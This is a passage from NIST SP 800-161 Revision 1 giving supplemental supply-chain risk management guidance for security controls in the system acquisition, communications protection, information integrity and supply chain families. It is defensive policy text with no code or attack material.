37 In the context of this enhancement, providers may include suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
139
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Supplemental C-SCRM Guidance: The location may be under the control of the suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers.
Enterprises should assess C-SCRM risks associated with a given geographic location and apply an
appropriate risk response, which may include defining locations that are or are not acceptable and
ensuring that appropriate protections are in place to address associated C-SCRM risk.
Level(s): 3
SA-10 DEVELOPER CONFIGURATION MANAGEMENT
Supplemental C-SCRM Guidance: Developer configuration management is critical for reducing
cybersecurity risks throughout the supply chain. By conducting configuration management activities,
developers reduce the occurrence and likelihood of flaws while increasing accountability and ownership for
the changes. Developer configuration management should be performed both by developers internal to
federal agencies and integrators or external service providers. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Related Controls: SA-10 (1), (2), (3), (4), (5), and (6)
SA-11 DEVELOPER TESTING AND EVALUATION
Supplemental C-SCRM Guidance: Depending on the origins of components, this control may be
implemented differently. For OTS (off-the-shelf) components, the acquirer should conduct research (e.g.,
via publicly available resources) or request proof to determine whether the supplier (OEM) has performed
such testing as part of their quality or security processes. When the acquirer has control over the application
and development processes, they should require this testing as part of the SDLC. In addition to the specific
types of testing activities described in the enhancements, examples of C-SCRM-relevant testing include
testing for counterfeits, verifying the origins of components, examining configuration settings prior to
integration, and testing interfaces. These types of tests may require significant resources and should be
prioritized based on criticality, threat, and vulnerability analyses (described in Section 2 and Appendix C),
as well as the effectiveness of testing techniques. Enterprises may also require third-party testing as part of
developer security testing. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
Related Controls: SA-11 (1), (2), (3), (4), (5), (6), (7), (8), and (9)
SA-15 DEVELOPMENT PROCESS, STANDARDS, AND TOOLS
Supplemental C-SCRM Guidance: Providing documented and formalized development processes to guide
internal and system integrator developers is critical to the enterprise’s efforts to effectively mitigate
cybersecurity risks throughout the supply chain. The enterprise should apply national and international
standards and best practices when implementing this control. Using existing standards promotes
consistency of implementation, reliable and defendable processes, and interoperability. The enterprise’s
development, maintenance, test, and deployment environments should all be covered by this control. The
tools included in this control can be manual or automated. The use of automated tools aids thoroughness,
efficiency, and the scale of analysis that helps address cybersecurity risks that arise in relation to the
development process throughout the supply chain. Additionally, the output of such activities and tools
provides useful inputs for C-SCRM processes, as described in Section 2 and Appendix C. This control has
applicability to the internal enterprise’s processes, information systems, and networks as well as applicable
system integrators’ processes, systems, and networks. Departments and agencies should refer to Appendix
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
140
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Related Controls: SA-15 enhancements (1), (2), (5), (6), and (7)
Control Enhancement(s):
(1)
DEVELOPMENT PROCESS, STANDARDS, AND TOOLS | CRITICALITY ANALYSIS
Supplemental C-SCRM Guidance: This enhancement identifies critical components within the
information system, which will help determine the specific C-SCRM activities to be implemented for
critical components. See C-SCRM Criticality Analysis described in Appendix C for additional context.
Level(s): 2, 3
(2)
DEVELOPMENT PROCESS, STANDARDS, AND TOOLS | THREAT MODELING AND VULNERABILITY
ANALYSIS
Supplemental C-SCRM Guidance: This enhancement provides threat modeling and vulnerability
analysis for the relevant federal agency and contractor products, applications, information systems, and
networks. Performing this analysis will help integrate C-SCRM into code refinement and modification
activities. See the C-SCRM threat and vulnerability analyses described in Appendix C for additional
context.
Level(s): 2, 3
Related Control(s): SA-15(5), SA-15(6), SA-15(7)
(3)
DEVELOPMENT PROCESS, STANDARDS, AND TOOLS | REUSE OF THREAT AND VULNERABILITY
INFORMATION
Supplemental C-SCRM Guidance: This enhancement encourages developers to reuse the threat and
vulnerability information produced by prior development efforts and lessons learned from using the
tools to inform ongoing development efforts. Doing so will help determine the C-SCRM activities
described in Section 2 and Appendix C.
Level(s): 3
SA-16 DEVELOPER-PROVIDED TRAINING
Supplemental C-SCRM Guidance: Developer-provided training for external and internal developers is
critical to C-SCRM. It addresses training the individuals responsible for federal systems and networks to
include applicable development environments. Developer-provided training in this control also applies to
the individuals who select system and network components. Developer-provided training should include C-
SCRM material to ensure that 1) developers are aware of potential threats and vulnerabilities when
developing, testing, and maintaining hardware and software, and 2) the individuals responsible for selecting
system and network components incorporate C-SCRM when choosing such components. Developer
training should also cover training for secure coding and the use of tools to find vulnerabilities in software.
Refer to Appendix F for additional guidance on security for critical software.
Level(s): 2, 3
Related Controls: AT-3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
141
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SA-17 DEVELOPER SECURITY AND PRIVACY ARCHITECTURE AND DESIGN
Supplemental C-SCRM Guidance: This control facilitates the use of C-SCRM information to influence
system architecture, design, and component selection decisions, including security functions. Examples
include identifying components that compose system architecture and design or selecting specific
components to ensure availability through multiple supplier or component selections. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028
on Improving the Nation's Cybersecurity.
Level(s): 2, 3
Related Controls: SA-17 (1) and (2)
SA-20 CUSTOMIZED DEVELOPMENT OF CRITICAL COMPONENTS
Supplemental C-SCRM Guidance: The enterprise may decide, based on their assessments of cybersecurity
risks throughout the supply chain, that they require customized development of certain critical components.
This control provides additional guidance on this activity. Enterprises should work with suppliers and
partners to ensure that critical components are identified. Organizations should ensure that they have a
continued ability to maintain custom-developed critical software components. For example, having the
source code, build scripts, and tests for a software component could enable an organization to have
someone else maintain it if necessary.
Level(s): 2, 3
SA-21 DEVELOPER SCREENING
Supplemental C-SCRM Guidance: The enterprise should implement screening processes for their internal
developers. For system integrators who may be providing key developers that address critical components,
the enterprise should ensure that appropriate processes for developer screening have been used. The
screening of developers should be included as a contractual requirement and be a flow-down requirement to
relevant sub-level subcontractors who provide development services or who have access to the
development environment.
Level(s): 2, 3
Control Enhancement(s):
(1)
DEVELOPER SCREENING | VALIDATION OF SCREENING
Supplemental C-SCRM Guidance: Internal developer screening should be validated. Enterprises may
validate system integrator developer screening by requesting summary data from the system integrator
to be provided post-validation.
Level(s): 2, 3
SA-22 UNSUPPORTED SYSTEM COMPONENTS
Supplemental C-SCRM Guidance: Acquiring products directly from qualified original equipment
manufacturers (OEMs) or their authorized distributors and resellers reduces cybersecurity risks in the
supply chain. In the case of unsupported system components, the enterprise should use authorized resellers
or distributors with an ongoing relationship with the supplier of the unsupported system components.
When purchasing alternative sources for continued support, enterprises should acquire directly from vetted
original equipment manufacturers (OEMs) or their authorized distributors and resellers. Decisions about
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
142
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
using alternative sources require input from the enterprise’s engineering resources regarding the differences
in alternative component options. For example, if an alternative is to acquire an open source software
component, the enterprise should identify the open source community development, test, acceptance, and
release processes. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
143
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: SYSTEM AND COMMUNICATIONS PROTECTION
[FIPS 200] specifies the System and Communications Protection minimum security requirement
as follows:
Organizations must: (i) monitor, control, and protect organizational communications
(i.e., information transmitted or received by organizational information systems) at the
external boundaries and key internal boundaries of the information systems; and (ii)
employ architectural designs, software development techniques, and systems
engineering principles that promote effective information security within organizational
information systems.
An enterprise’s communications infrastructure is composed of ICT/OT components and systems,
which have their own supply chains. These communications allow users or administrators to
remotely access an enterprise’s systems and to connect to the internet, other ICT/OT within the
enterprise, contractor systems, and – occasionally – supplier systems. An enterprise’s
communications infrastructure may be provided and supported by suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers.
SC-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: System and communications protection policies and procedures should
address cybersecurity risks throughout the supply chain in relation to the enterprise’s processes, systems,
and networks. Enterprise-level and program-specific policies help establish and clarify these requirements,
and corresponding procedures provide instructions for meeting these requirements. Policies and procedures
should include the coordination of communications among and across multiple enterprise entities within the
enterprise, as well as the communications methods, external connections, and processes used between the
enterprise and its suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers.
Level(s): 1, 2, 3
SC-4
INFORMATION IN SHARED RESOURCES
Supplemental C-SCRM Guidance: The enterprise may share information system resources with system
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers. Protecting information in shared resources in support of various supply chain activities is
challenging when outsourcing key operations. Enterprises may either share too much and increase their risk
or share too little and make it difficult for suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers to be efficient in their service delivery. The
enterprise should work with developers to define a structure or process for information sharing, including
the data shared, the method of sharing, and to whom (the specific roles) the information is provided.
Appropriate privacy, dissemination, handling, and clearance requirements should be accounted for in the
information-sharing process.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
144
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SC-5
DENIAL-OF-SERVICE PROTECTION
Supplemental C-SCRM Guidance: C-SCRM Guidance supplemental guidance is provided in control
enhancement SC-5 (2).
Control Enhancement(s):
(1)
DENIAL-OF-SERVICE PROTECTION | CAPACITY, BANDWIDTH, AND REDUNDANCY
Supplemental C-SCRM Guidance: The enterprise should include requirements for excess capacity,
bandwidth, and redundancy into agreements with suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers.
Level(s): 2
SC-7
BOUNDARY PROTECTION
Supplemental C-SCRM Guidance: The enterprise should implement appropriate monitoring mechanisms
and processes at the boundaries between the agency systems and suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers’ systems. Provisions for
boundary protections should be incorporated into agreements with suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers. There may be
multiple interfaces throughout the enterprise, supplier systems and networks, and the SDLC. Appropriate
vulnerability, threat, and risk assessments should be performed to ensure proper boundary protections for
supply chain components and supply chain information flow. The vulnerability, threat, and risk
assessments can aid in scoping boundary protection to a relevant set of criteria and help manage associated
costs. For contracts with external service providers, enterprises should ensure that the provider satisfies
boundary control requirements pertinent to environments and networks within their span of control. Further
detail is provided in Section 2 and Appendix C. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
Level(s): 2
Control Enhancement(s):
(1)
BOUNDARY PROTECTION | ISOLATION OF SECURITY TOOLS, MECHANISMS, AND SUPPORT
COMPONENTS
Supplemental C-SCRM Guidance: The enterprise should provide separation and isolation of
development, test, and security assessment tools and operational environments and relevant monitoring
tools within the enterprise’s information systems and networks. This control applies the entity
responsible for creating software and hardware, to include federal agencies and prime contractors. As
such, this controls applies to the federal agency and applicable supplier information systems and
networks. Enterprises should require their prime contractors to implement this control and flow down
this requirement to relevant sub-tier contractors. If a compromise or information leakage happens in
any one environment, the other environments should still be protected through the separation and
isolation mechanisms or techniques.
Level(s): 3
Related Controls: SR-3(3)
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
145
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
(2)
BOUNDARY PROTECTION | PROTECT AGAINST UNAUTHORIZED PHYSICAL CONNECTIONS
Supplemental C-SCRM Guidance: This control is relevant to C-SCRM as it applies to external service
providers.
Level(s): 2,3
Related Controls: SR-3(3)
(3)
BOUNDARY PROTECTION | BLOCKS COMMUNICATION FROM NON-ORGANIZATIONALLY
CONFIGURED HOSTS
Supplemental C-SCRM Guidance: This control is relevant to C-SCRM as it applies to external service
providers.
Level(s): 3
SC-8
TRANSMISSION CONFIDENTIALITY AND INTEGRITY
Supplemental C-SCRM Guidance: The requirements for transmission confidentiality and integrity should
be integrated into agreements with suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers. Acquirers, suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers may repurpose existing
security mechanisms (e.g., authentication, authorization, or encryption) to achieve enterprise confidentiality
and integrity requirements. The degree of protection should be based on the sensitivity of information to be
transmitted and the relationship between the enterprise and the suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers. Enterprises should require
their prime contractors to implement this control and flow down this requirement to relevant sub-tier
contractors. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
SC-18 MOBILE CODE
Supplemental C-SCRM Guidance: The enterprise should use this control in various applications of mobile
code within their information systems and networks. Examples include acquisition processes such as the
electronic transmission of supply chain information (e.g., email), the receipt of software components,
logistics information management in RFID, or transport sensors infrastructure.
Level(s): 3
Control Enhancement(s):
(1)
MOBILE CODE | ACQUISITION, DEVELOPMENT, AND USE
Supplemental C-SCRM Guidance: The enterprise should employ rigorous supply chain protection
techniques in the acquisition, development, and use of mobile code to be deployed in the information
system. Examples include ensuring that mobile code originates from vetted sources when acquired, that
vetted system integrators are used for the development of custom mobile code or prior to installing, and
that verification processes are in place for acceptance criteria prior to installation in order to verify the
source and integrity of code. Note that mobile code can be both code for the underlying information
systems and networks (e.g., RFID device applications) or for information systems and components.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
146
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SC-27 PLATFORM-INDEPENDENT APPLICATIONS
Supplemental C-SCRM Guidance: The use of trusted platform-independent applications is essential to C-
SCRM. The enhanced portability of platform-independent applications enables enterprises to switch
external service providers more readily in the event that one becomes compromised, thereby reducing
vendor-dependent cybersecurity risks. This is especially relevant for critical applications on which multiple
systems may rely.
Level(s): 2, 3
SC-28 PROTECTION OF INFORMATION AT REST
Supplemental C-SCRM Guidance: The enterprise should include provisions for the protection of
information at rest into their agreements with suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. The enterprise should also ensure that they
provide appropriate protections within the information systems and networks for data at rest for the
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers information, such as source code, testing data, blueprints, and intellectual property
information. This control should be applied throughout the SDLC, including during requirements,
development, manufacturing, test, inventory management, maintenance, and disposal. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant sub-
tier contractors. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: SR-3(3)
SC-29 HETEROGENEITY
Supplemental C-SCRM Guidance: Heterogeneity techniques include the use of different operating systems,
virtualization techniques, and multiple sources of supply. Multiple sources of supply can improve
component availability and reduce the impact of a supply chain cybersecurity compromise. In case of a
supply chain cybersecurity compromise, an alternative source of supply will allow the enterprises to more
rapidly switch to an alternative system/component that may not be affected by the compromise.
Addtionally, heterogeneous components decrease the attack surface by limiting the impact to the subset of
the infrastructure that is using vulnerable components.
Level(s): 2, 3
SC-30 CONCEALMENT AND MISDIRECTION
Supplemental C-SCRM Guidance: Concealment and misdirection techniques for C-SCRM include the
establishment of random resupply times, the concealment of location, randomly changing the fake location
used, and randomly changing or shifting information storage into alternative servers or storage
mechanisms.
Level(s): 2, 3
Control Enhancement(s):
(1)
CONCEALMENT AND MISDIRECTION | RANDOMNESS
Supplemental C-SCRM Guidance: Supply chain processes are necessarily structured with predictable,
measurable, and repeatable processes for the purpose of efficiency and cost reduction. This opens up
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
147
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
the opportunity for potential breach. In order to protect against compromise, the enterprise should
employ techniques to introduce randomness into enterprise operations and assets in the enterprise’s
systems or networks (e.g., randomly switching among several delivery enterprises or routes, or
changing the time and date of receiving supplier software updates if previously predictably scheduled).
Level(s): 2, 3
(2)
CONCEALMENT AND MISDIRECTION | CHANGE PROCESSING AND STORAGE LOCATIONS
Supplemental C-SCRM Guidance: Changes in processing or storage locations can be used to protect
downloads, deliveries, or associated supply chain metadata. The enterprise may leverage such
techniques within the their information systems and networks to create uncertainty about the activities
targeted by adversaries. Establishing a few process changes and randomizing their use – whether it is
for receiving, acceptance testing, storage, or other supply chain activities – can aid in reducing the
likelihood of a supply chain event.
Level(s): 2, 3
(3)
CONCEALMENT AND MISDIRECTION | MISLEADING INFORMATION
Supplemental C-SCRM Guidance: The enterprise can convey misleading information as part of
concealment and misdirection efforts to protect the information system being developed and the
enterprise’s systems and networks. Examples of such efforts in security include honeynets or
virtualized environments. Implementations can be leveraged to convey misleading information. These
may be considered advanced techniques that require experienced resources to effectively implement
them. If an enterprise decides to use honeypots, it should be done in concert with legal counsel or
following the enterprise’s policies.
Level(s): 2, 3
(4)
CONCEALMENT AND MISDIRECTION | CONCEALMENT OF SYSTEM COMPONENTS
Supplemental C-SCRM Guidance: The enterprise may employ various concealment and misdirection
techniques to protect information about the information system being developed and the enterprise’s
information systems and networks. For example, the delivery of critical components to a central or
trusted third-party depot can be used to conceal or misdirect any information regarding the
component’s use or the enterprise using the component. Separating components from their associated
information into differing physical and electronic delivery channels and obfuscating the information
through various techniques can be used to conceal information and reduce the opportunity for a
potential loss of confidentiality of the component or its use, condition, or other attributes.
Level(s): 2, 3
SC-36 DISTRIBUTED PROCESSING AND STORAGE
Supplemental C-SCRM Guidance: Processing and storage can be distributed both across the enterprise’s
systems and networks and across the SDLC. The enterprise should ensure that these techniques are applied
in both contexts. Development, manufacturing, configuration management, test, maintenance, and
operations can use distributed processing and storage. This control applies to the entity responsible for
processing and storage functions or related infrastructure, to include federal agencies and contractors. As
such, this control applies to the federal agency and applicable supplier information systems and networks.
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
Related Controls: SR-3(3)
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
148
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SC-37 OUT-OF-BAND CHANNELS
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in control
enhancement SC-37 (1).
Control Enhancement(s):
(1)
OUT-OF-BAND CHANNELS | ENSURE DELIVERY AND TRANSMISSION
Supplemental C-SCRM Guidance: The enterprise should employ security safeguards to ensure that
only specific individuals or information systems receive the information about the information system
or its development environment and processes. For example, proper credentialing and authorization
documents should be requested and verified prior to the release of critical components, such as custom
chips, custom software, or information during delivery.
Level(s): 2, 3
SC-38 OPERATIONS SECURITY
Supplemental C-SCRM Guidance: The enterprise should ensure that appropriate supply chain threat and
vulnerability information is obtained from and provided to the applicable operational security processes.
Level(s): 2, 3
Related Control(s): SR-7
SC-47 ALTERNATIVE COMMUNICATIONS PATHS
Supplemental C-SCRM Guidance: If necessary and appropriate, suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers should be included in the
alternative communication paths described in this control.
Level(s): 1, 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
149
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: SYSTEM AND INFORMATION INTEGRITY
[FIPS 200] specifies the System and Information Integrity minimum security requirement as
follows:
Organizations must: (i) identify, report, and correct information and information system
flaws in a timely manner; (ii) provide protection from malicious code at appropriate
locations within organizational information systems; and (iii) monitor information
system security alerts and advisories and take appropriate actions in response.
System and information integrity for systems and components traversing the supply chain is
critical for managing cybersecurity risks throughout the supply chain. The insertion of malicious
code and counterfeits are two primary examples of cybersecurity risks throughout the supply
chain, both of which can at least partially be addressed by deploying system and information
integrity controls. Enterprises should ensure that adequate system and information integrity
protections are part of C-SCRM.
SI-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The enterprise should include C-SCRM in system and information
integrity policy and procedures, including ensuring that program-specific requirements for employing
various integrity verification tools and techniques are clearly defined. System and information integrity for
information systems, components, and the underlying information systems and networks is critical for
managing cybersecurity risks throughout the supply chain. The insertion of malicious code and counterfeits
are two primary examples of cybersecurity risks throughout the supply chain, both of which can be at least
partially addressed by deploying system and information integrity controls.
Level(s): 1, 2, 3
Related Controls: SR-1, 9, 10, 11
SI-2
FLAW REMEDIATION
Supplemental C-SCRM Guidance: The output of flaw remediation activities provides useful input into the
ICT/OT SCRM processes described in Section 2 and Appendix C. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
Control Enhancement(s):
(1)
FLAW REMEDIATION | AUTOMATIC SOFTWARE AND FIRMWARE UPDATES
Supplemental C-SCRM Guidance: The enterprise should specify the various software assets within its
information systems and networks that require automated updates (both indirect and direct). This
specification of assets should be defined from criticality analysis results, which provide information on
critical and non-critical functions and components (see Section 2 and Appendix C). A centralized patch
management process may be employed for evaluating and managing updates prior to deployment.
Those software assets that require direct updates from a supplier should only accept updates that
originate directly from the OEM unless specifically deployed by the acquirer, such as with a
centralized patch management process. Departments and agencies should refer to Appendix F to
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
150
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2
SI-3
MALICIOUS CODE PROTECTION
Supplemental C-SCRM Guidance: Because the majority of code operated in federal systems is not
developed by the Federal Government, malicious code threats often originate from the supply chain. This
controls applies to the federal agency and contractors with code-related responsibilities (e.g., developing
code, installing patches, performing system upgrades, etc.), as well as applicable contractor information
systems and networks. Enterprises should require their prime contractors to implement this control and
flow down this requirement to relevant sub-tier contractors. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Related Controls: SA-11; SI-7(15); SI-3(4), (6), (8), and (10); SR-3(3)
SI-4
SYSTEM MONITORING
Supplemental C-SCRM Guidance: This control includes monitoring vulnerabilities that result from past
supply chain cybersecurity compromises, such as malicious code implanted during software development
and set to activate after deployment. System monitoring is frequently performed by external service
providers. Service-level agreements with these providers should be structured to appropriately reflect this
control. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
Control Enhancement(s):
(1)
SYSTEM MONITORING | INTEGRATED SITUATIONAL AWARENESS
Supplemental C-SCRM Guidance: System monitoring information may be correlated with that of
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers, if appropriate. The results of correlating monitoring information may point to supply
chain cybersecurity vulnerabilities that require mitigation or compromises.
Level(s): 2, 3
(2)
SYSTEM MONITORING | RISK FOR INDIVIDUALS
Supplemental C-SCRM Guidance: Persons identified as being of higher risk may include enterprise
employees, contractors, and other third parties (e.g., volunteers, visitors) who may have the need or
ability to access to an enterprise’s system, network, or system environment. The enterprise may
implement enhanced oversight of these higher-risk individuals in accordance with policies, procedures,
and – if relevant – terms of an agreement and in coordination with appropriate officials.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
151
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SI-5
SECURITY ALERTS, ADVISORIES, AND DIRECTIVES
Supplemental C-SCRM Guidance: The enterprise should evaluate security alerts, advisories, and directives
for cybersecurity supply chain impacts and follow up if needed. US-CERT, FASC, and other authoritative
entities generate security alerts and advisories that are applicable to C-SCRM. Additional laws and
regulations will impact who and how additional advisories are provided. Enterprises should ensure that
their information-sharing protocols and processes include sharing alerts, advisories, and directives with
relevant parties with whom they have an agreement to deliver products or perform services. Enterprises
should provide direction or guidance as to what actions are to be taken in response to sharing such an alert,
advisory, or directive. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 1, 2, 3
SI-7
SOFTWARE, FIRMWARE, AND INFORMATION INTEGRITY
Supplemental C-SCRM Guidance: This control applies to the federal agency and applicable supplier
products, applications, information systems, and networks. The integrity of all applicable systems and
networks should be systematically tested and verified to ensure that it remains as required so that the
systems/components traversing through the supply chain are not impacted by unanticipated changes. The
integrity of systems and components should also be tested and verified. Applicable verification tools
include digital signature or checksum verification; acceptance testing for physical components; confining
software to limited privilege environments, such as sandboxes; code execution in contained environments
prior to use; and ensuring that if only binary or machine-executable code is available, it is obtained directly
from the OEM or a verified supplier or distributer. Mechanisms for this control are discussed in detail in
[NIST SP 800-53, Rev. 5]. This control applies to federal agencies and applicable supplier information
systems and networks. When purchasing an ICT/OT product, an enterprise should perform due diligence to
understand what a supplier’s integrity assurance practices are. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: SR-3(3)
Control Enhancement(s):
(1)
SOFTWARE, FIRMWARE, AND INFORMATION INTEGRITY | BINARY OR MACHINE EXECUTABLE
CODE
Supplemental C-SCRM Guidance: The enterprise should obtain binary or machine-executable code
directly from the OEM/developer or other verified source.
Level(s): 2, 3
(2)
SOFTWARE, FIRMWARE, AND INFORMATION INTEGRITY | CODE AUTHENTICATION
Supplemental C-SCRM Guidance: The enterprise should ensure that code authentication mechanisms,
such as digital signatures, are implemented to ensure the integrity of software, firmware, and
information.
Level(s): 3
SI-12
INFORMATION MANAGEMENT AND RETENTION
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
152
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Supplemental C-SCRM Guidance: C-SCRM should be included in information management and retention
requirements, especially when the sensitive and proprietary information of a system integrator, supplier, or
external service provider is concerned.
Level(s): 3
SI-20
TAINTING
Supplemental C-SCRM Guidance: Suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers may have access to the sensitive information of a
federal agency. In this instance, enterprises should require their prime contractors to implement this control
and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
Related Controls: SR-9
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
153
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: SUPPLY CHAIN RISK MANAGEMENT
[FIPS 200] does not specify Supply Chain Risk Management minimum security requirements.
[NIST SP 800-53, Rev. 5] established a new control family: Supply Chain Risk Management.
The supplemental guidance below expands upon the SR controls and provides further
information and context for their application. This is a new family in SP 800-53, Rev. 5, and
guidance already exists in that publication. This document (NIST SP 800-161, Rev. 1) includes
all SR control enhancements from SP 800-53, Rev. 5, and the following SR controls and control
enhancements have been added to NIST SP 800-53, Rev. 5 [SR-13]. Readers should consult
NIST SP 800-53, Rev. 5 SR controls together with the controls in this section.
SR-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: C-SCRM policies are developed at Level 1 for the overall enterprise and
at Level 2 for specific missions and functions. C-SCRM policies can be implemented at Levels 1, 2, and 3,
depending on the level of depth and detail. C-SCRM procedures are developed at Level 2 for specific
missions and functions and at Level 3 for specific systems. Enterprise functions including but not limited to
information security, legal, risk management, and acquisition should review and concur on the
development of C-SCRM policies and procedures or provide guidance to system owners for developing
system-specific C-SCRM procedures.
Level(s): 1, 2, 3
SR-2
SUPPLY CHAIN RISK MANAGEMENT PLAN
Supplemental C-SCRM Guidance: C-SCRM plans describe implementations, requirements, constraints,
and implications at the system level. C-SCRM plans are influenced by the enterprise’s other risk
assessment activities and may inherit and tailor common control baselines defined at Level 1 and Level 2.
C-SCRM plans defined at Level 3 work in collaboration with the enterprise’s C-SCRM Strategy and
Policies (Level 1 and Level 2) and the C-SCRM Implementation Plan (Level 1 and Level 2) to provide a
systematic and holistic approach for cybersecurity supply chain risk management across the enterprise.
C-SCRM plans should be developed as a standalone document and only integrated into existing system
security plans if enterprise constraints require it.
Level(s): 3
Related Controls: PL-2
SR-3
SUPPLY CHAIN CONTROLS AND PROCESSES
Supplemental C-SCRM Guidance: Section 2 and Appendix C of this document provide detailed guidance
on implementing this control. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 1, 2, 3
Control Enhancement(s):
(1)
SUPPLY CHAIN CONTROLS AND PROCESSES | DIVERSE SUPPLY BASE
